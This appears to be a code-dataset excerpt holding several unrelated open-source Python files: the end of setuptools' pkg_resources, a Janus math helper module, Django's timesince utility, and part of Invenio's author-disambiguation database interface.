parts = requires_dist.split(';', 1) + ['']
distvers = parts[0].strip()
mark = parts[1].strip()
distvers = re.sub(self.EQEQ, r"\1==\2\3", distvers)
distvers = distvers.replace('(', '').replace(')', '')
return (distvers, mark)
def _compute_dependencies(self):
"""Recompute this distribution's dependencies."""
from _markerlib import compile as compile_marker
dm = self.__dep_map = {None: []}
reqs = []
# Including any condition expressions
for req in self._parsed_pkg_info.get_all('Requires-Dist') or []:
distvers, mark = self._preparse_requirement(req)
parsed = next(parse_requirements(distvers))
parsed.marker_fn = compile_marker(mark)
reqs.append(parsed)
def reqs_for_extra(extra):
for req in reqs:
if req.marker_fn(override={'extra':extra}):
yield req
common = frozenset(reqs_for_extra(None))
dm[None].extend(common)
for extra in self._parsed_pkg_info.get_all('Provides-Extra') or []:
extra = safe_extra(extra.strip())
dm[extra] = list(frozenset(reqs_for_extra(extra)) - common)
return dm
_distributionImpl = {
'.egg': Distribution,
'.egg-info': Distribution,
'.dist-info': DistInfoDistribution,
}
def issue_warning(*args,**kw):
level = 1
g = globals()
try:
# find the first stack frame that is *not* code in
# the pkg_resources module, to use for the warning
while sys._getframe(level).f_globals is g:
level += 1
except ValueError:
pass
from warnings import warn
warn(stacklevel = level+1, *args, **kw)
def parse_requirements(strs):
"""Yield ``Requirement`` objects for each specification in `strs`
`strs` must be an instance of ``basestring``, or a (possibly-nested)
iterable thereof.
"""
# create a steppable iterator, so we can handle \-continuations
lines = iter(yield_lines(strs))
def scan_list(ITEM,TERMINATOR,line,p,groups,item_name):
items = []
while not TERMINATOR(line,p):
if CONTINUE(line,p):
try:
line = next(lines)
p = 0
except StopIteration:
raise ValueError(
"\\ must not appear on the last nonblank line"
)
match = ITEM(line,p)
if not match:
raise ValueError("Expected "+item_name+" in",line,"at",line[p:])
items.append(match.group(*groups))
p = match.end()
match = COMMA(line,p)
if match:
p = match.end() # skip the comma
elif not TERMINATOR(line,p):
raise ValueError(
"Expected ',' or end-of-list in",line,"at",line[p:]
)
match = TERMINATOR(line,p)
if match: p = match.end() # skip the terminator, if any
return line, p, items
for line in lines:
match = DISTRO(line)
if not match:
raise ValueError("Missing distribution spec", line)
project_name = match.group(1)
p = match.end()
extras = []
match = OBRACKET(line,p)
if match:
p = match.end()
line, p, extras = scan_list(
DISTRO, CBRACKET, line, p, (1,), "'extra' name"
)
line, p, specs = scan_list(VERSION,LINE_END,line,p,(1,2),"version spec")
specs = [(op,safe_version(val)) for op,val in specs]
yield Requirement(project_name, specs, extras)
def _sort_dists(dists):
tmp = [(dist.hashcmp,dist) for dist in dists]
tmp.sort()
dists[::-1] = [d for hc,d in tmp]
class Requirement:
def __init__(self, project_name, specs, extras):
"""DO NOT CALL THIS UNDOCUMENTED METHOD; use Requirement.parse()!"""
self.unsafe_name, project_name = project_name, safe_name(project_name)
self.project_name, self.key = project_name, project_name.lower()
index = [(parse_version(v),state_machine[op],op,v) for op,v in specs]
index.sort()
self.specs = [(op,ver) for parsed,trans,op,ver in index]
self.index, self.extras = index, tuple(map(safe_extra,extras))
self.hashCmp = (
self.key, tuple([(op,parsed) for parsed,trans,op,ver in index]),
frozenset(self.extras)
)
self.__hash = hash(self.hashCmp)
def __str__(self):
specs = ','.join([''.join(s) for s in self.specs])
extras = ','.join(self.extras)
if extras: extras = '[%s]' % extras
return '%s%s%s' % (self.project_name, extras, specs)
def __eq__(self,other):
return isinstance(other,Requirement) and self.hashCmp==other.hashCmp
def __contains__(self,item):
if isinstance(item,Distribution):
if item.key != self.key: return False
if self.index: item = item.parsed_version # only get if we need it
elif isinstance(item,basestring):
item = parse_version(item)
last = None
compare = lambda a, b: (a > b) - (a < b) # -1, 0, 1
for parsed,trans,op,ver in self.index:
action = trans[compare(item,parsed)] # Indexing: 0, 1, -1
if action=='F':
return False
elif action=='T':
return True
elif action=='+':
last = True
elif action=='-' or last is None: last = False
if last is None: last = True # no rules encountered
return last
def __hash__(self):
return self.__hash
def __repr__(self): return "Requirement.parse(%r)" % str(self)
@staticmethod
def parse(s):
reqs = list(parse_requirements(s))
if reqs:
if len(reqs)==1:
return reqs[0]
raise ValueError("Expected only one requirement", s)
raise ValueError("No requirements found", s)
state_machine = {
# =><
'<': '--T',
'<=': 'T-T',
'>': 'F+F',
'>=': 'T+F',
'==': 'T..',
'!=': 'F++',
}
def _get_mro(cls):
"""Get an mro for a type or classic class"""
if not isinstance(cls,type):
class cls(cls,object): pass
return cls.__mro__[1:]
return cls.__mro__
def _find_adapter(registry, ob):
"""Return an adapter factory for `ob` from `registry`"""
for t in _get_mro(getattr(ob, '__class__', type(ob))):
if t in registry:
return registry[t]
def ensure_directory(path):
"""Ensure that the parent directory of `path` exists"""
dirname = os.path.dirname(path)
if not os.path.isdir(dirname):
os.makedirs(dirname)
def split_sections(s):
"""Split a string or iterable thereof into (section,content) pairs
Each ``section`` is a stripped version of the section header ("[section]")
and each ``content`` is a list of stripped lines excluding blank lines and
comment-only lines. If there are any such lines before the first section
header, they're returned in a first ``section`` of ``None``.
"""
section = None
content = []
for line in yield_lines(s):
if line.startswith("["):
if line.endswith("]"):
if section or content:
yield section, content
section = line[1:-1].strip()
content = []
else:
raise ValueError("Invalid section heading", line)
else:
content.append(line)
# wrap up last segment
yield section, content
def _mkstemp(*args,**kw):
from tempfile import mkstemp
old_open = os.open
try:
os.open = os_open # temporarily bypass sandboxing
return mkstemp(*args,**kw)
finally:
os.open = old_open # and then put it back
# Set up global resource manager (deliberately not state-saved)
_manager = ResourceManager()
def _initialize(g):
for name in dir(_manager):
if not name.startswith('_'):
g[name] = getattr(_manager, name)
_initialize(globals())
# Prepare the master working set and make the ``require()`` API available
_declare_state('object', working_set = WorkingSet())
try:
# Does the main program list any requirements?
from __main__ import __requires__
except ImportError:
pass # No: just use the default working set based on sys.path
else:
# Yes: ensure the requirements are met, by prefixing sys.path if necessary
try:
working_set.require(__requires__)
except VersionConflict: # try it without defaults already on sys.path
working_set = WorkingSet([]) # by starting with an empty path
for dist in working_set.resolve(
parse_requirements(__requires__), Environment()
):
working_set.add(dist)
for entry in sys.path: # add any missing entries from sys.path
if entry not in working_set.entries:
working_set.add_entry(entry)
sys.path[:] = working_set.entries # then copy back to sys.path
require = working_set.require
iter_entry_points = working_set.iter_entry_points
add_activation_listener = working_set.subscribe
run_script = working_set.run_script
run_main = run_script # backward compatibility
# Activate all distributions already on sys.path, and ensure that
# all distributions added to the working set in the future (e.g. by
# calling ``require()``) will get activated as well.
add_activation_listener(lambda dist: dist.activate())
working_set.entries=[]
list(map(working_set.add_entry,sys.path)) # match order
| mit |
JanusWind/FC | janus_helper.py | 1 | 4081 | ################################################################################
##
## Janus -- GUI Software for Processing Thermal-Ion Measurements from the
## Wind Spacecraft's Faraday Cups
##
## Copyright (C) 2016 Bennett A. Maruca (bmaruca@udel.edu)
##
## This program is free software: you can redistribute it and/or modify it under
## the terms of the GNU General Public License as published by the Free Software
## Foundation, either version 3 of the License, or (at your option) any later
## version.
##
## This program is distributed in the hope that it will be useful, but WITHOUT
## ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
## FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
## details.
##
## You should have received a copy of the GNU General Public License along with
## this program. If not, see http://www.gnu.org/licenses/.
##
################################################################################
################################################################################
## LOAD THE NECESSARY MODULES.
################################################################################
from math import log10, floor, sqrt, fsum
################################################################################
## DEFINE THE FUNCTION FOR ROUNDING A VALUE AND CONVERTING IT TO A STRING.
################################################################################
# Define the function for rounding a value to a specified number of significant
# digits.
def round_sig( val, sig ) :
if ( val is None ) :
return None
elif ( val == 0. ) :
return 0.
else :
return round( val,
sig - int( floor( log10( abs( val ) ) ) ) - 1 )
################################################################################
## DEFINE THE FUNCTION FOR COMPUTING UNIT VECTOR
################################################################################
# Define the function for computing unit vector
def calc_arr_norm( v ):
mag = sqrt( fsum( [ c**2 for c in v ]) )
return tuple( [ ( c/mag) for c in v ] )
################################################################################
## DEFINE THE FUNCTION FOR COMPUTING DOT PRODUCT
################################################################################
# Define the function for computing dot product
def calc_arr_dot( u,v ) :
if ( len(u) != len(v) ) :
raise TypeError( 'Unequal lengths.' )
return fsum([ x[0]*x[1] for x in zip(u,v) ])
################################################################################
## DEFINE THE FUNCTIONS FOR CONVERTING TO/FROM NNI'S
################################################################################
# Note. The set of "NNI" values is defined to include all non-negative integers
# and "float('inf')".
# Define the function for converting a string to an NNI.
def str_to_nni( v ) :
# Standardize the argument by ensuring that it is a string, writing
# all letters in lower case, and removing whitespace.
val = str( v ).lower( ).replace( ' ', '' )
# If the string indicates an infinite value, return 'float( 'inf' )'.
# Otherwise, attempt to return a non-negative integer.
if ( ( val == 'inf' ) or ( val == 'infinity' ) ) :
return float( 'inf' )
else :
# Convert the argument to an integer.
ret = int( val )
# If the integer is negative, raise an error. Otherwise, return
# it.
if ( ret < 0 ) :
raise TypeError( 'Negative integer not permitted.' )
return None
else :
return ret
"""
# Define the function for converting a numerical value to a string with a
# specified number of significant digits.
def conv_val_to_str( val, sig ) :
# Round the value to the specified number of significant digits.
rnd = round_sig( val, sig )
# Convert the rounded value into an appropriately formatted string and
# return it.
if ( ( abs( rnd ) >= 0.01 ) and
( abs( rnd ) < 10.**sig ) ) :
return( '{:f}'.format( rnd ) )
else :
return( '{:e}'.format( rnd ) )
"""
| gpl-3.0 |
marckuz/django | django/utils/timesince.py | 409 | 2671 | from __future__ import unicode_literals
import calendar
import datetime
from django.utils.html import avoid_wrapping
from django.utils.timezone import is_aware, utc
from django.utils.translation import ugettext, ungettext_lazy
TIMESINCE_CHUNKS = (
(60 * 60 * 24 * 365, ungettext_lazy('%d year', '%d years')),
(60 * 60 * 24 * 30, ungettext_lazy('%d month', '%d months')),
(60 * 60 * 24 * 7, ungettext_lazy('%d week', '%d weeks')),
(60 * 60 * 24, ungettext_lazy('%d day', '%d days')),
(60 * 60, ungettext_lazy('%d hour', '%d hours')),
(60, ungettext_lazy('%d minute', '%d minutes'))
)
def timesince(d, now=None, reversed=False):
"""
Takes two datetime objects and returns the time between d and now
as a nicely formatted string, e.g. "10 minutes". If d occurs after now,
then "0 minutes" is returned.
Units used are years, months, weeks, days, hours, and minutes.
Seconds and microseconds are ignored. Up to two adjacent units will be
displayed. For example, "2 weeks, 3 days" and "1 year, 3 months" are
possible outputs, but "2 weeks, 3 hours" and "1 year, 5 days" are not.
Adapted from
http://web.archive.org/web/20060617175230/http://blog.natbat.co.uk/archive/2003/Jun/14/time_since
"""
# Convert datetime.date to datetime.datetime for comparison.
if not isinstance(d, datetime.datetime):
d = datetime.datetime(d.year, d.month, d.day)
if now and not isinstance(now, datetime.datetime):
now = datetime.datetime(now.year, now.month, now.day)
if not now:
now = datetime.datetime.now(utc if is_aware(d) else None)
delta = (d - now) if reversed else (now - d)
# Deal with leapyears by subtracing the number of leapdays
delta -= datetime.timedelta(calendar.leapdays(d.year, now.year))
# ignore microseconds
since = delta.days * 24 * 60 * 60 + delta.seconds
if since <= 0:
# d is in the future compared to now, stop processing.
return avoid_wrapping(ugettext('0 minutes'))
for i, (seconds, name) in enumerate(TIMESINCE_CHUNKS):
count = since // seconds
if count != 0:
break
result = avoid_wrapping(name % count)
if i + 1 < len(TIMESINCE_CHUNKS):
# Now get the second item
seconds2, name2 = TIMESINCE_CHUNKS[i + 1]
count2 = (since - (seconds * count)) // seconds2
if count2 != 0:
result += ugettext(', ') + avoid_wrapping(name2 % count2)
return result
def timeuntil(d, now=None):
"""
Like timesince, but returns a string measuring the time until
the given time.
"""
return timesince(d, now, reversed=True)
| bsd-3-clause |
inspirehep/invenio | modules/bibauthorid/lib/bibauthorid_dbinterface.py | 2 | 174626 | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2011, 2012, 2013, 2015, 2018 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
'''
Filename: bibauthorid_dbinterface.py
This is the only file in bibauthorid which should
use the database. It offers an interface for all
the other files in the module.
'''
from invenio.config import CFG_SITE_URL, \
CFG_BIBAUTHORID_SEARCH_ENGINE_MAX_DATACHUNK_PER_INSERT_DB_QUERY
import invenio.bibauthorid_config as bconfig
import gc
import datetime
from itertools import groupby, count, ifilter, chain, imap, repeat, izip
from operator import itemgetter
from invenio.search_engine import deserialize_via_marshal
from invenio.search_engine_utils import get_fieldvalues
from invenio.access_control_engine import acc_authorize_action
from invenio.config import CFG_SITE_URL
from invenio.dbquery import run_sql
from invenio.errorlib import register_exception
from invenio import bibtask
from msgpack import packb as serialize
from msgpack import unpackb as deserialize
try:
from collections import defaultdict
except ImportError:
from invenio.bibauthorid_general_utils import defaultdict
from invenio.dbquery import run_sql
from invenio.htmlutils import X
from invenio.search_engine import perform_request_search, get_record
from invenio.bibrecord import record_get_field_value, \
record_get_field_instances
from invenio.access_control_engine import acc_authorize_action
from invenio.bibauthorid_name_utils import split_name_parts, \
create_canonical_name, create_matchable_name
from invenio.bibauthorid_general_utils import memoized
from invenio.bibauthorid_general_utils import monitored
from invenio.bibauthorid_logutils import Logger
import time
from invenio.intbitset import intbitset
import re
# run_sql = monitored(run_sql)
logger = Logger("db_interface")
MARC_100_700_CACHE = None
#
#
# aidPERSONIDPAPERS table ###
#
#
# ********** setters **********#
def add_signature(sig, name, pid, flag=0, user_level=0, m_name=None):
'''
Adds the given signature to the specified author.
@param sig: signature (bibref_table, bibref_value, bibrec)
@type sig: tuple (int, int, int)
@param name: name to be assigned for the author
@type name: str
@param pid: author identifier
@type pid: int
@param flag: author-paper association status
@type flag: int
@param user_level: lcul
@type user_level: int
'''
if not name:
name = get_name_by_bibref(sig[0:2])
if not m_name:
m_name = create_matchable_name(name)
run_sql('insert into aidPERSONIDPAPERS'
'(personid, bibref_table, bibref_value, bibrec, name, m_name, flag, lcul) '
'values (%s, %s, %s, %s, %s, %s, %s, %s)',
(pid, str(sig[0]), sig[1], sig[2], name, m_name, flag, user_level))
def move_signature(sig, pid, force_claimed=False, set_unclaimed=False):
'''
Reassigns an already assigned signature to a different author.
@param sig: signature (bibref_table, bibref_value, bibrec)
@type sig: tuple (int, int, int)
@param pid: author identifier
@type pid: int
@param force_claimed: only if signature is claimed or rejected
@type force_claimed: bool
@param set_unclaimed: set signature as unclaimed
@type set_unclaimed: bool
'''
query = ('update aidPERSONIDPAPERS '
'set personid=%s ')
if set_unclaimed:
query += ", flag=0 "
query += ('where bibref_table like %s '
'and bibref_value=%s '
'and bibrec=%s ')
if not force_claimed:
query += " and (flag <> 2 and flag <> -2)"
run_sql(query, (pid, int(sig[0]), sig[1], sig[2]))
def modify_signature(old_ref, rec, new_ref, new_name):
'''
Modifies an already assigned signature.
@param old_ref: old bibref (bibref_table, bibref_value)
@type old_ref: tuple (int, int)
@param rec: paper identifier
@type rec: int
@param new_ref: new bibref (bibref_table, bibref_value)
@type new_ref: tuple (int, int)
@param new_name: new name to be assigned for the author
@type new_name: str
'''
if not new_name:
new_name = get_name_by_bibref(new_ref)
m_name = create_matchable_name(new_name)
run_sql('update aidPERSONIDPAPERS '
'set bibref_table=%s, bibref_value=%s, name=%s, m_name=%s '
'where bibref_table like %s '
'and bibref_value=%s '
'and bibrec=%s',
(str(new_ref[0]), new_ref[1], new_name, m_name,
str(old_ref[0]), old_ref[1], rec))
def remove_signatures(sigs): # remove_sigs
'''
Deletes the given signatures.
@param sigs: signatures to be removed [(bibref_table, bibref_value, bibrec),]
@type sigs: list [(int, int, int),]
'''
for sig in sigs:
_delete_from_aidpersonidpapers_where(table=sig[0], ref=sig[1], rec=sig[2])
def remove_papers(recs): # remove_all_bibrecs
'''
Deletes all data about the given papers from all authors.
@param recs: paper identifiers
@type recs: list [int,]
'''
if recs:
recs_sqlstr = _get_sqlstr_from_set(recs)
run_sql('delete from aidPERSONIDPAPERS '
'where bibrec in %s' % recs_sqlstr)
def transfer_papers_to_author(papers_data, new_pid):
'''
It passes possesion of papers to another author.
@param papers_data: paper relevant data [(pid, bibref_table, bibref_value, bibrec),]
@type papers_data: list [(int, str, int, int),]
@param new_pid: author identifier
@type new_pid: int
'''
for pid, table, ref, rec, flag in papers_data:
run_sql('update aidPERSONIDPAPERS '
'set personid=%s, flag=%s '
'where personid=%s '
'and bibref_table like %s '
'and bibref_value=%s '
'and bibrec=%s',
(new_pid, flag, pid, table, ref, rec))
def confirm_papers_to_author(pid, sigs_str, user_level=0): # confirm_papers_to_person
'''
Confirms the relationship between the given author and the specified papers
(from user input).
@param pid: author identifier
@type pid: int
@param sigs_str: signatures to confirm (e.g. [('100:7531,9024'),] )
@type sigs_str: list [(str),]
@param user_level: lcul
@type user_level: int
@return: confirmation status and message key for each signature [(status, message_key),]
@rtype: list [(bool, str),]
'''
pids_to_update = set([pid])
statuses = list()
for s in sigs_str:
sig = _split_signature_string(s)
table, ref, rec = sig
# the paper should be present, either assigned or rejected
papers = run_sql('select bibref_table, bibref_value, bibrec, personid, flag '
'from aidPERSONIDPAPERS '
'where bibrec=%s '
'and flag >= -2',
(rec,))
# select bibref_table, bibref_value, bibrec
# from aidPERSONIDPAPERS
# where personid=pid
# and bibrec=rec
# and flag > -2
author_not_rejected_papers = [p[0:3] for p in papers if p[3] == pid and p[4] > -2]
# select bibref_table, bibref_value, bibrec
# from aidPERSONIDPAPERS
# where personid=pid
# and bibrec=rec
# and flag=-2
author_rejected_papers = [p[0:3] for p in papers if p[3] == pid and p[4] == -2]
# select bibref_table, bibref_value, bibrec
# from aidPERSONIDPAPERS
# where personid <> pid
# and bibrec=rec
# and flag > -2
diff_author_not_rejected_papers = [p[0:3] for p in papers if p[3] != pid and p[4] > -2]
# select *
# from aidPERSONIDPAPERS "
# where bibref_table=table
# and bibref_value=ref
# and bibrec=rec
# and flag > -2
sig_exists = [True for p in papers if p[0] == table and p[1] == ref and p[4] > -2]
# All papers that are being claimed should be present in aidPERSONIDPAPERS, thus:
# assert author_not_rejected_papers or author_rejected_papers or diff_author_not_rejected_papers, 'There should be at least something regarding this bibrec!'
# assert sig_exists, 'The signature should exist'
# should always be valid.
# BUT, it usually happens that claims get done out of the browser/session cache which is hours/days old,
# hence it happens that papers are claimed when they no longer exist in the system.
# For the sake of mental sanity, instead of crashing from now on we just ignore such cases.
if not (author_not_rejected_papers or author_rejected_papers or diff_author_not_rejected_papers) or not sig_exists:
statuses.append({'success': False, 'operation': 'confirm'})
continue
statuses.append({'success': True, 'operation': 'confirm'})
# It should not happen that a paper is assigned more than once to the same person.
# But sometimes it happens in rare unfortunate cases of bad concurrency circumstances,
# so we try to fix it directly instead of crashing here.
# Once a better solution for dealing with concurrency is found, the following asserts
# shall be reenabled to allow better control on what happens.
# assert len(author_not_rejected_papers) < 2, "This paper should not be assigned to this person more then once! %s" % author_not_rejected_papers
# assert len(diff_author_not_rejected_papers) < 2, "There should not be
# more than one copy of this paper! %s" % diff_author_not_rejected_papers
# If the bibrec is present with a different bibref, the existing one must be moved somewhere
# else before we can claim the incoming one.
for pap in author_not_rejected_papers:
# move to someone else all unwanted signatures
if pap != sig:
new_pid = get_free_author_id()
pids_to_update.add(new_pid)
move_signature(pap, new_pid)
# Make sure that the incoming claim is unique and get rid of all rejections, they are useless
# from now on.
remove_signatures([sig])
add_signature(sig, None, pid)
run_sql('update aidPERSONIDPAPERS '
'set personid=%s, flag=%s, lcul=%s '
'where bibref_table like %s '
'and bibref_value=%s '
'and bibrec=%s',
(pid, '2', user_level, table, ref, rec))
update_canonical_names_of_authors(pids_to_update)
#UPDATE EXTERNAL IDS OF AUTHOR!!
return statuses
def reject_papers_from_author(pid, sigs_str, user_level=0): # reject_papers_from_person
'''
Confirms the negative relationship between the given author and the
specified papers (from user input).
@param pid: author identifier
@type pid: int
@param sigs_str: signatures to confirm (e.g. [('100:7531,9024'),] )
@type sigs_str: list [(str),]
@param user_level: lcul
@type user_level: int
@return: confirmation status and message key for each signature [(status, message_key),]
@rtype: list [(bool, str),]
'''
pids_to_update = set([pid])
statuses = list()
for s in sigs_str:
sig = _split_signature_string(s)
name = get_name_by_bibref(sig[:2])
matchable_name = create_matchable_name(name)
matched_authors_pids = get_authors_by_name(matchable_name,
use_matchable_name=True)
# We will choose a new author from the matched_authors_pids list.
# We need to ensure that the current author's pid is no longer in the list.
try:
matched_authors_pids.remove(pid)
except ValueError:
# Happens when the signature name differs from current author's name.
pass
new_pid = None
for potential_pid in matched_authors_pids:
if not get_signatures_of_paper_and_author(sig,
potential_pid,
include_rejected=True):
new_pid = potential_pid
break
if not new_pid:
new_pid = get_free_author_id()
table, ref, rec = sig
# the paper should be present, either assigned or rejected
sig_exists = get_author_info_of_confirmed_paper(sig)
# For the sake of mental sanity (see commentis in confirm_papers_to_author) just ignore if this paper does not longer exist.
# assert sig_exists, 'The signature should exist'
if not sig_exists:
statuses.append({'success': False, 'operation': 'reject'})
continue
statuses.append({'success': True, 'operation': 'reject'})
# If the record is already assigned to a different person the rejection is meaningless.
# If not, we assign the paper to someone else (it doesn't matter who because eventually
# it will be reassigned by tortoise) and reject it from the current person.
current_pid, name = sig_exists[0]
if current_pid == pid:
sig_is_claimed = author_has_claimed_signature(pid, sig)
move_signature(sig, new_pid,
force_claimed=sig_is_claimed,
set_unclaimed=True)
pids_to_update.add(new_pid)
add_signature((table, ref, rec), name, pid, flag=-2, user_level=user_level)
update_canonical_names_of_authors(pids_to_update)
return statuses
def author_has_claimed_signature(pid, sig, negative=False):
"""
Checks whether a particular author has claimed one signature.
@param pid: the person id of the author
@type pid: int
@param sig: the signature in question (100 / 700, bibref, bibrec)
@type sig: tuple of 3 elements
@param negative: if this is a "disclaim"
@type negative: boolean
@return: A boolean indicating whether the person has claimed a signature.
"""
try:
return run_sql("""select * from aidPERSONIDPAPERS
where personid = %s and bibref_table = %s
and bibref_value = %s and bibrec = %s
and flag = %s""",
(pid, str(sig[0]), sig[1], sig[2],
-2 if negative else 2))[0][0] > -1
except IndexError:
return False
def reset_papers_of_author(pid, sigs_str): # reset_papers_flag
'''
Redefines the relationship of the given author and the specified papers as
neutral (neither claimed nor rejected).
@param pid: author identifier
@type pid: int
@param sigs_str: signatures to reset (e.g. [('100:7531,9024'),] )
@type sigs_str: list [(str),]
@return: confirmation status and message key for each signature [(status, message_key),]
@rtype: list [(bool, str),]
'''
statuses = list()
for s in sigs_str:
sig = _split_signature_string(s)
table, ref, rec = sig
papers = _select_from_aidpersonidpapers_where(
select=['bibref_table',
'bibref_value',
'bibrec',
'flag'],
table=table,
ref=ref,
pid=pid,
rec=rec)
assert len(papers) < 2
# select bibref_table, bibref_value, bibrec
# from aidPERSONIDPAPERS
# where personid=pid
# and bibrec=rec
# and flag=-2
author_rejected_papers = [p[0:3] for p in papers if p[3] == -2]
# select bibref_table, bibref_value, bibrec
# from aidPERSONIDPAPERS
# where personid=pid
# and bibref_table=table
# and bibref_value=ref
# and bibrec=rec
# and flag > -2
sig_exists = [p[0:3] for p in papers if p[0] == table and p[1] == ref and p[3] > -2]
# For the sake of mental sanity (see comments in confirm_papers_to_author) just ignore if this paper does not longer exist.
# assert sig_exists, 'The signature should exist'
if author_rejected_papers or not sig_exists:
statuses.append({'success': False, 'operation': 'reset'})
continue
statuses.append({'success': True, 'operation': 'reset'})
run_sql('delete from aidPERSONIDPAPERS '
'where bibref_table like %s '
'and bibref_value=%s '
'and bibrec=%s', sig)
add_signature(sig, None, pid)
return statuses
def duplicated_conirmed_papers_exist(printer, repair=False): # check_duplicated_papers
'''
It examines if there are records of confirmed papers in aidPERSONIDPAPERS
table which are in an impaired state (duplicated) and repairs them if
specified.
@param printer: for log keeping
@type printer: func
@param repair: fix the duplicated records
@type repair: bool
@return: duplicated records are found
@rtype: bool
'''
duplicated_conirmed_papers_found = False
author_confirmed_papers = dict()
to_reassign = list()
confirmed_papers = run_sql('select personid, bibrec '
'from aidPERSONIDPAPERS '
'where flag <> %s', (-2,))
for pid, rec in confirmed_papers:
author_confirmed_papers.setdefault(pid, []).append(rec)
for pid, recs in author_confirmed_papers.iteritems():
if not len(recs) == len(set(recs)):
duplicated_conirmed_papers_found = True
duplicates = sorted(recs)
duplicates = set([rec for i, rec in enumerate(duplicates[:-1]) if rec == duplicates[i + 1]])
printer("Person %d has duplicated papers: %s" % (pid, duplicates))
if repair:
for duprec in duplicates:
printer("Repairing duplicated bibrec %s" % str(duprec))
claimed_from_involved = run_sql('select personid, bibref_table, bibref_value, bibrec, flag '
'from aidPERSONIDPAPERS '
'where personid=%s '
'and bibrec=%s '
'and flag >= 2', (pid, duprec))
if len(claimed_from_involved) != 1:
to_reassign.append(duprec)
_delete_from_aidpersonidpapers_where(rec=duprec, pid=pid)
else:
run_sql('delete from aidPERSONIDPAPERS '
'where personid=%s '
'and bibrec=%s '
'and flag < 2', (pid, duprec))
if repair and to_reassign:
printer("Reassigning deleted bibrecs %s" % str(to_reassign))
from invenio.bibauthorid_rabbit import rabbit
rabbit(to_reassign)
return duplicated_conirmed_papers_found
def duplicated_confirmed_signatures_exist(printer, repair=False): # check_duplicated_signatures
'''
It examines if there are records of confirmed signatures in
aidPERSONIDPAPERS table which are in an impaired state (duplicated) and
repairs them if specified.
@param printer: for log keeping
@type printer: func
@param repair: fix the duplicated signatures
@type repair: bool
@return: duplicated signatures are found
@rtype: bool
'''
duplicated_confirmed_signatures_found = False
paper_confirmed_bibrefs = dict()
to_reassign = list()
confirmed_sigs = run_sql('select bibref_table, bibref_value, bibrec '
'from aidPERSONIDPAPERS '
'where flag > %s', (-2,))
for table, ref, rec in confirmed_sigs:
paper_confirmed_bibrefs.setdefault(rec, []).append((table, ref))
for rec, bibrefs in paper_confirmed_bibrefs.iteritems():
if not len(bibrefs) == len(set(bibrefs)):
duplicated_confirmed_signatures_found = True
duplicates = sorted(bibrefs)
duplicates = set([bibref for i, bibref in enumerate(duplicates[:-1]) if bibref == duplicates[i + 1]])
printer("Paper %d has duplicated signatures: %s" % (rec, duplicates))
if repair:
for table, ref in duplicates:
printer("Repairing duplicated signature %s" % str((table, ref)))
claimed = _select_from_aidpersonidpapers_where(
select=['personid',
'bibref_table',
'bibref_value',
'bibrec'],
table=table,
ref=ref,
rec=rec,
flag=2)
if len(claimed) != 1:
to_reassign.append(rec)
_delete_from_aidpersonidpapers_where(table=table, ref=ref, rec=rec)
else:
run_sql('delete from aidPERSONIDPAPERS '
'where bibref_table like %s '
'and bibref_value=%s '
'and bibrec=%s '
'and flag < 2', (table, ref, rec))
if repair and to_reassign:
printer("Reassigning deleted bibrecs %s" % str(to_reassign))
from invenio.bibauthorid_rabbit import rabbit
rabbit(to_reassign)
return duplicated_confirmed_signatures_found
def wrong_names_exist(printer, repair=False): # check_wrong_names
'''
It examines if there are records in aidPERSONIDPAPERS table which carry a
wrong name and repairs them if specified.
@param printer: for log keeping
@type printer: func
@param repair: fix the found wrong names
@type repair: bool
@return: wrong names are found
@rtype: bool
'''
wrong_names_found = False
wrong_names, wrong_names_count = get_wrong_names()
if wrong_names_count > 0:
wrong_names_found = True
printer("%d corrupted names in aidPERSONIDPAPERS." % wrong_names_count)
for wrong_name in wrong_names:
if wrong_name[2]:
printer(
"Outdated name, ('%s' instead of '%s' (%s:%d))." %
(wrong_name[3], wrong_name[2], wrong_name[0], wrong_name[1]))
else:
printer("Invalid id (%s:%d)." % (wrong_name[0], wrong_name[1]))
if repair:
printer("Fixing wrong name: %s" % str(wrong_name))
if wrong_name[2]:
m_name = create_matchable_name(wrong_name[2])
run_sql('update aidPERSONIDPAPERS '
'set name=%s, m_name=%s, '
'where bibref_table like %s '
'and bibref_value=%s',
(wrong_name[2], m_name, wrong_name[0], wrong_name[1]))
else:
_delete_from_aidpersonidpapers_where(table=wrong_name[0], ref=wrong_name[1])
return wrong_names_found
def impaired_rejections_exist(printer, repair=False): # check_wrong_rejection
'''
It examines if there are records of rejected papers in aidPERSONIDPAPERS
table which are in an impaired state (not assigned or both confirmed and
rejected for the same author) and repairs them if specified.
@param printer: for log keeping
@type printer: func
@param repair: fix the damaged records
@type repair: bool
@return: damaged records are found
@rtype: bool
'''
impaired_rejections_found = False
to_reassign = list()
to_deal_with = list()
rejected_papers = set(_select_from_aidpersonidpapers_where(
select=['bibref_table', 'bibref_value', 'bibrec'], flag=-2))
confirmed_papers = set(run_sql('select bibref_table, bibref_value, bibrec '
'from aidPERSONIDPAPERS '
'where flag > %s', (-2,)))
not_assigned_papers = rejected_papers - confirmed_papers
for paper in not_assigned_papers:
printer("Paper (%s:%s,%s) was rejected but never reassigned" % paper)
to_reassign.append(paper)
rejected_papers = set(
_select_from_aidpersonidpapers_where(
select=[
'personid',
'bibref_table',
'bibref_value',
'bibrec'],
flag=-2))
confirmed_papers = set(run_sql('select personid, bibref_table, bibref_value, bibrec '
'from aidPERSONIDPAPERS '
'where flag > %s', (-2,)))
# papers which are both confirmed and rejected for/from the same author
both_confirmed_and_rejected_papers = rejected_papers & confirmed_papers
for paper in both_confirmed_and_rejected_papers:
printer("Conflicting assignment/rejection: %s" % str(paper))
to_deal_with.append(paper)
if not_assigned_papers or both_confirmed_and_rejected_papers:
impaired_rejections_found = True
if repair and (to_reassign or to_deal_with):
from invenio.bibauthorid_rabbit import rabbit
if to_reassign:
# Rabbit is not designed to reassign signatures which are rejected but not assigned:
# All signatures should be assigned. If a rejection occurs, the signature should get
